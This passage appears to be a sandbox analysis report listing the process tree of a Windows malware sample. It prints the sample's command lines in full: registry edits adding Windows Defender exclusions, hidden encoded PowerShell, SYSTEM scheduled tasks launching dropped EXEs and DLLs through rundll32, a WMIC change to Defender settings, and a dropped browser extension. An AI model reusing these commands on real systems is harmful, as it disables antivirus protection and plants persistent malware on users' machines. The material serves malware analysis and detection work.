  Command line: powershell "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\AMqhlrBDqRJU2\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\AMqhlrBDqRJU2\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\OJBbginKvssDnbEKbsR\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\OJBbginKvssDnbEKbsR\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\UQtSSXvqU\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\UQtSSXvqU\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\ezMWJXFFLyUn\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\ezMWJXFFLyUn\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\hMiQKFvmPLjeC\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\hMiQKFvmPLjeC\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\ProgramData\CSlqozbqXBZGgaVB\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\ProgramData\CSlqozbqXBZGgaVB\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Temp\DMGDvKLKeLwsjNbUi\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Temp\DMGDvKLKeLwsjNbUi\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Windows\Temp\wqgwJMWXAwfbGfvq\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Windows\Temp\wqgwJMWXAwfbGfvq\" /t REG_DWORD /d 0 /reg:64;"
  - Drops file in System32 directory
  - Modifies data under HKEY_USERS
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
PID 5624, depth 3: C:\Windows\SysWOW64\cmd.exe
  Command line: "C:\Windows\system32\cmd.exe" /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\AMqhlrBDqRJU2" /t REG_DWORD /d 0 /reg:32
PID 4008, depth 4: C:\Windows\SysWOW64\reg.exe
  Command line: REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\AMqhlrBDqRJU2" /t REG_DWORD /d 0 /reg:32
PID 1120, depth 3: C:\Windows\SysWOW64\reg.exe
  Command line: "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\AMqhlrBDqRJU2" /t REG_DWORD /d 0 /reg:64
PID 2832, depth 3: C:\Windows\SysWOW64\reg.exe
  Command line: "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\OJBbginKvssDnbEKbsR" /t REG_DWORD /d 0 /reg:32
PID 2388, depth 3: C:\Windows\SysWOW64\reg.exe
  Command line: "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\OJBbginKvssDnbEKbsR" /t REG_DWORD /d 0 /reg:64
PID 5596, depth 3: C:\Windows\SysWOW64\reg.exe
  Command line: "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\UQtSSXvqU" /t REG_DWORD /d 0 /reg:32
PID 2576, depth 3: C:\Windows\SysWOW64\reg.exe
  Command line: "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\UQtSSXvqU" /t REG_DWORD /d 0 /reg:64
PID 5220, depth 3: C:\Windows\SysWOW64\reg.exe
  Command line: "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\ezMWJXFFLyUn" /t REG_DWORD /d 0 /reg:32
PID 5864, depth 3: C:\Windows\SysWOW64\reg.exe
  Command line: "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\ezMWJXFFLyUn" /t REG_DWORD /d 0 /reg:64
PID 1768, depth 3: C:\Windows\SysWOW64\reg.exe
  Command line: "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\hMiQKFvmPLjeC" /t REG_DWORD /d 0 /reg:32
PID 3000, depth 3: C:\Windows\SysWOW64\reg.exe
  Command line: "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\hMiQKFvmPLjeC" /t REG_DWORD /d 0 /reg:64
PID 3840, depth 3: C:\Windows\SysWOW64\reg.exe
  Command line: "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\ProgramData\CSlqozbqXBZGgaVB /t REG_DWORD /d 0 /reg:32
PID 5876, depth 3: C:\Windows\SysWOW64\reg.exe
  Command line: "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\ProgramData\CSlqozbqXBZGgaVB /t REG_DWORD /d 0 /reg:64
PID 5636, depth 3: C:\Windows\SysWOW64\reg.exe
  Command line: "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:32
PID 3580, depth 3: C:\Windows\SysWOW64\reg.exe
  Command line: "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:64
PID 1668, depth 3: C:\Windows\SysWOW64\reg.exe
  Command line: "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:32
PID 4960, depth 3: C:\Windows\SysWOW64\reg.exe
  Command line: "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:64
PID 6088, depth 3: C:\Windows\SysWOW64\reg.exe
  Command line: "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Users\Admin\AppData\Local\Temp\DMGDvKLKeLwsjNbUi /t REG_DWORD /d 0 /reg:32
PID 3312, depth 3: C:\Windows\SysWOW64\reg.exe
  Command line: "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Users\Admin\AppData\Local\Temp\DMGDvKLKeLwsjNbUi /t REG_DWORD /d 0 /reg:64
PID 696, depth 3: C:\Windows\SysWOW64\reg.exe
  Command line: "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Windows\Temp\wqgwJMWXAwfbGfvq /t REG_DWORD /d 0 /reg:32
PID 1748, depth 3: C:\Windows\SysWOW64\reg.exe
  Command line: "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Windows\Temp\wqgwJMWXAwfbGfvq /t REG_DWORD /d 0 /reg:64
PID 2472, depth 2: C:\Windows\SysWOW64\schtasks.exe
  Command line: schtasks /CREATE /TN "gOiGpzPfM" /SC once /ST 14:53:00 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="
  (The -EncodedCommand value is base64 of the UTF-16LE string: start-process -WindowStyle Hidden gpupdate.exe /force)
  - Scheduled Task/Job: Scheduled Task
PID 1960, depth 2: C:\Windows\SysWOW64\schtasks.exe
  Command line: schtasks /run /I /tn "gOiGpzPfM"
PID 2800, depth 2: C:\Windows\SysWOW64\schtasks.exe
  Command line: schtasks /DELETE /F /TN "gOiGpzPfM"
PID 1472, depth 2: C:\Windows\SysWOW64\schtasks.exe
  Command line: schtasks /CREATE /TN "FPIEUdZLMYPzsiUNM" /SC once /ST 06:18:59 /RU "SYSTEM" /TR "\"C:\Windows\Temp\wqgwJMWXAwfbGfvq\aweCcjUdaBzQgay\DlrnvPY.exe\" Wy /bJqXdidgE 757674 /S" /V1 /F
  - Drops file in Windows directory
  - Scheduled Task/Job: Scheduled Task
PID 3856, depth 2: C:\Windows\SysWOW64\schtasks.exe
  Command line: schtasks /run /I /tn "FPIEUdZLMYPzsiUNM"
PID 5696, depth 2: C:\Windows\SysWOW64\WerFault.exe
  Command line: C:\Windows\SysWOW64\WerFault.exe -u -p 1720 -s 652
  - Program crash
PID 4524, depth 1: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
  Command line: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==
  (The -EncodedCommand value is base64 of the UTF-16LE string: start-process -WindowStyle Hidden gpupdate.exe /force)
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
PID 1592, depth 2: C:\Windows\system32\gpupdate.exe
  Command line: "C:\Windows\system32\gpupdate.exe" /force
PID 5280, depth 1: C:\Windows\system32\svchost.exe
  Command line: C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s fhsvc
PID 5144, depth 1: C:\Windows\system32\svchost.exe
  Command line: C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -s WPDBusEnum
PID 5916, depth 1: C:\Windows\system32\gpscript.exe
  Command line: gpscript.exe /RefreshSystemParam
PID 5200, depth 1: C:\Windows\Temp\wqgwJMWXAwfbGfvq\aweCcjUdaBzQgay\DlrnvPY.exe
  Command line: C:\Windows\Temp\wqgwJMWXAwfbGfvq\aweCcjUdaBzQgay\DlrnvPY.exe Wy /bJqXdidgE 757674 /S
  - Checks computer location settings
  - Executes dropped EXE
  - Drops Chrome extension
  - Drops desktop.ini file(s)
  - Drops file in System32 directory
  - Drops file in Program Files directory
  - Modifies data under HKEY_USERS
  - Suspicious behavior: EnumeratesProcesses
PID 5128, depth 2: C:\Windows\SysWOW64\schtasks.exe
  Command line: schtasks /DELETE /F /TN "bEtnHIcecDUtXwQuWS"
PID 3840, depth 2: C:\Windows\SysWOW64\cmd.exe
  Command line: "C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m cmd.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True" &
PID 4052, depth 3: C:\Windows\SysWOW64\forfiles.exe
  Command line: forfiles /p c:\windows\system32 /m cmd.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True"
PID 1848, depth 4: C:\Windows\SysWOW64\cmd.exe
  Command line: /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True
PID 4544, depth 5: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
  Command line: powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True
  - Command and Scripting Interpreter: PowerShell
  - Drops file in System32 directory
  - Modifies data under HKEY_USERS
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
PID 3752, depth 6: C:\Windows\SysWOW64\Wbem\WMIC.exe
  Command line: "C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True
  - Suspicious use of AdjustPrivilegeToken
PID 1624, depth 2: C:\Windows\SysWOW64\schtasks.exe
  Command line: schtasks /CREATE /TR "rundll32 \"C:\Program Files (x86)\UQtSSXvqU\RGDzRw.dll\",#1" /RU "SYSTEM" /SC ONLOGON /TN "OcPshDNvhDnVmSv" /V1 /F
  - Drops file in Windows directory
  - Scheduled Task/Job: Scheduled Task
PID 2868, depth 2: C:\Windows\SysWOW64\schtasks.exe
  Command line: schtasks /CREATE /TN "OcPshDNvhDnVmSv2" /F /xml "C:\Program Files (x86)\UQtSSXvqU\qAmzzaV.xml" /RU "SYSTEM"
  - Scheduled Task/Job: Scheduled Task
PID 2220, depth 2: C:\Windows\SysWOW64\schtasks.exe
  Command line: schtasks /END /TN "OcPshDNvhDnVmSv"
PID 3168, depth 2: C:\Windows\SysWOW64\schtasks.exe
  Command line: schtasks /DELETE /F /TN "OcPshDNvhDnVmSv"
PID 32, depth 2: C:\Windows\SysWOW64\schtasks.exe
  Command line: schtasks /CREATE /TN "qjEkZtbojbmFFd" /F /xml "C:\Program Files (x86)\AMqhlrBDqRJU2\UniKJqx.xml" /RU "SYSTEM"
  - Scheduled Task/Job: Scheduled Task
PID 6060, depth 2: C:\Windows\SysWOW64\schtasks.exe
  Command line: schtasks /CREATE /TN "SzzOVfCIijTTD2" /F /xml "C:\ProgramData\CSlqozbqXBZGgaVB\sphbpgC.xml" /RU "SYSTEM"
  - Scheduled Task/Job: Scheduled Task
PID 4308, depth 2: C:\Windows\SysWOW64\schtasks.exe
  Command line: schtasks /CREATE /TN "PiigmmnlzELKpVpJK2" /F /xml "C:\Program Files (x86)\OJBbginKvssDnbEKbsR\PFUpSQi.xml" /RU "SYSTEM"
  - Scheduled Task/Job: Scheduled Task
PID 4332, depth 2: C:\Windows\SysWOW64\schtasks.exe
  Command line: schtasks /CREATE /TN "XrMInsNlrWTcBhRONQr2" /F /xml "C:\Program Files (x86)\hMiQKFvmPLjeC\HnXYHKd.xml" /RU "SYSTEM"
  - Scheduled Task/Job: Scheduled Task
PID 4868, depth 2: C:\Windows\SysWOW64\schtasks.exe
  Command line: schtasks /CREATE /TN "MRTHivZIQsRdEanwm" /SC once /ST 17:49:15 /RU "SYSTEM" /TR "rundll32 \"C:\Windows\Temp\wqgwJMWXAwfbGfvq\QBGdMxfA\njHglJk.dll\",#1 /gCwdidSsIC 757674" /V1 /F
  - Drops file in Windows directory
  - Scheduled Task/Job: Scheduled Task
PID 1468, depth 2: C:\Windows\SysWOW64\schtasks.exe
  Command line: schtasks /run /I /tn "MRTHivZIQsRdEanwm"
PID 1948, depth 2: C:\Windows\SysWOW64\schtasks.exe
  Command line: schtasks /CREATE /TN "Bogpd1" /SC once /ST 16:21:04 /F /RU "Admin" /TR "\"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe\" --restore-last-session"
  - Scheduled Task/Job: Scheduled Task
PID 2776, depth 2: C:\Windows\SysWOW64\schtasks.exe
  Command line: schtasks /run /I /tn "Bogpd1"
PID 5252, depth 2: C:\Windows\SysWOW64\schtasks.exe
  Command line: schtasks /DELETE /F /TN "Bogpd1"
PID 4760, depth 2: C:\Windows\SysWOW64\schtasks.exe
  Command line: schtasks /DELETE /F /TN "FPIEUdZLMYPzsiUNM"
PID 4056, depth 2: C:\Windows\SysWOW64\WerFault.exe
  Command line: C:\Windows\SysWOW64\WerFault.exe -u -p 5200 -s 2364
  - Program crash
PID 1120, depth 1: C:\Windows\SysWOW64\WerFault.exe
  Command line: C:\Windows\SysWOW64\WerFault.exe -pss -s 356 -p 1720 -ip 1720
PID 4476, depth 1: C:\Windows\system32\rundll32.EXE
  Command line: C:\Windows\system32\rundll32.EXE "C:\Windows\Temp\wqgwJMWXAwfbGfvq\QBGdMxfA\njHglJk.dll",#1 /gCwdidSsIC 757674
PID 5876, depth 2: C:\Windows\SysWOW64\rundll32.exe
  Command line: C:\Windows\system32\rundll32.EXE "C:\Windows\Temp\wqgwJMWXAwfbGfvq\QBGdMxfA\njHglJk.dll",#1 /gCwdidSsIC 757674
  - Blocklisted process makes network request
  - Checks BIOS information in registry
  - Loads dropped DLL
  - Enumerates system info in registry
  - Modifies data under HKEY_USERS
PID 1964, depth 3: C:\Windows\SysWOW64\schtasks.exe
  Command line: schtasks /DELETE /F /TN "MRTHivZIQsRdEanwm"
PID 2420, depth 1: C:\Windows\SysWOW64\WerFault.exe
  Command line: C:\Windows\SysWOW64\WerFault.exe -pss -s 528 -p 1928 -ip 1928
PID 5944, depth 1: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  Command line: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --restore-last-session
  - Enumerates system info in registry
  - Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
  - Suspicious use of FindShellTrayWindow
PID 804, depth 2: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  Command line: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=90.0.4430.212 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=90.0.818.66 --initial-client-data=0x108,0x10c,0x110,0xe4,0x114,0x7ffa7edb3cb8,0x7ffa7edb3cc8,0x7ffa7edb3cd8
PID 1984, depth 2: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  Command line: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2068,11755025348738165846,9056326601940252092,131072 --gpu-preferences=SAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAoAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAB4AAAAAAAAAHgAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAAIAAAAAAAAAAgAAAAAAAAA --mojo-platform-channel-handle=2076 /prefetch:2
PID 1368, depth 2: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  Command line: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2068,11755025348738165846,9056326601940252092,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2124 /prefetch:3
PID 2520, depth 2: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  Command line: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2068,11755025348738165846,9056326601940252092,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2776 /prefetch:8
PID 3948, depth 2: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  Command line: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2068,11755025348738165846,9056326601940252092,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3236 /prefetch:1
PID 1920, depth 2: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  Command line: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2068,11755025348738165846,9056326601940252092,131072 --lang=en-US --extension-process --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3244 /prefetch:1
PID 3024, depth 2: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  Command line: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2068,11755025348738165846,9056326601940252092,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3628 /prefetch:1
PID 1420, depth 2: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  Command line: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2068,11755025348738165846,9056326601940252092,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4440 /prefetch:1
PID 32, depth 2: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  Command line: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2068,11755025348738165846,9056326601940252092,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=11 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5384 /prefetch:1
PID 4088, depth 2: C:\Program Files (x86)\Microsoft\Edge\Application\90.0.818.66\identity_helper.exe
  Command line: "C:\Program Files (x86)\Microsoft\Edge\Application\90.0.818.66\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2068,11755025348738165846,9056326601940252092,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5704 /prefetch:8
PID 3580, depth 2: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  Command line: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2068,11755025348738165846,9056326601940252092,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5804 /prefetch:1
PID 3840, depth 2: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  Command line: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2068,11755025348738165846,9056326601940252092,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5924 /prefetch:1
PID 3488, depth 2: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  Command line: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2068,11755025348738165846,9056326601940252092,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=13 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6340 /prefetch:1
PID 3176, depth 2: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  Command line: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2068,11755025348738165846,9056326601940252092,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=14 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6480 /prefetch:1
PID 5916, depth 2: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  Command line: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2068,11755025348738165846,9056326601940252092,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=15 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6460 /prefetch:1
PID 4996, depth 2: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  Command line: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=2068,11755025348738165846,9056326601940252092,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=6184 /prefetch:8
PID 2736, depth 2: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  Command line: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2068,11755025348738165846,9056326601940252092,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=17 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5780 /prefetch:1
PID 5264, depth 2: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  Command line: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2068,11755025348738165846,9056326601940252092,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=18 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6296 /prefetch:1
PID 5220, depth 1: C:\Windows\SysWOW64\WerFault.exe
  Command line: C:\Windows\SysWOW64\WerFault.exe -pss -s 528 -p 1928 -ip 1928
PID 1812, depth 1: C:\Windows\SysWOW64\WerFault.exe
  Command line: C:\Windows\SysWOW64\WerFault.exe -pss -s 356 -p 1928 -ip 1928
PID 2720, depth 1: C:\Windows\System32\CompPkgSrv.exe
  Command line: C:\Windows\System32\CompPkgSrv.exe -Embedding
PID 3140, depth 1: C:\Windows\System32\CompPkgSrv.exe
  Command line: C:\Windows\System32\CompPkgSrv.exe -Embedding
PID 3460, depth 1: C:\Windows\SysWOW64\WerFault.exe
